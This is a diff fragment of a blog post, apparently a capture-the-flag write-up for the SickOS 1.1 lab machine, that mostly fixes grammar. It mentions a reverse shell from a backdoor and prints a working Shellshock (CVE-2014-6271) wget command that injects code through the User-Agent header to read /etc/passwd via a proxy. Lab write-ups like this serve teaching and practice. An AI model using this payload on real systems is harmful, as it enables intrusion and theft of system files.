aancw/leonids/_posts/2018-12-25-sickos-1-1-writeup.md

 $
 ```

 Gotcha!
-We have reverse shell from our backdoor.
+We have a reverse shell from our backdoor.
 Next, exploiting shellsock vulnerability.

 **Shellsock Attack Vector**

 We will use this attack vector for rooting the machine.
-If you are don't know about shellsock, you can read explanation from [coderwall](https://coderwall.com/p/5db5eg/understanding-the-shellshock-vulnerability)
+If you are don't know about shellsock, you can read the explanation from [coderwall](https://coderwall.com/p/5db5eg/understanding-the-shellshock-vulnerability)

 > The **Shellshock** vulnerability, also know as **CVE-2014-6271**, allows attackers to inject their own code into [Bash](http://www.gnu.org/software/bash/) using specially crafted **environment variables**

 From nikto scan result, we know that affected endpoint is `cgi-bin/status`.
-So, we need to test this by sending malicious crafted request with wget, curl or other tool.
-For simple Proof, we are sending request to affected endpoint with `cat /etc/passwd` for showing `/etc/passwd` content.
+So, we need to test this by sending a malicious crafted request with wget, curl or other tools.
+For simple Proof, we are sending a request to the affected endpoint with `cat /etc/passwd` for showing `/etc/passwd` content.

 ```bash
 ↳ wget -qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=yes -e http_proxy=192.168.43.202:3128 http://192.168.43.202/cgi-bin/status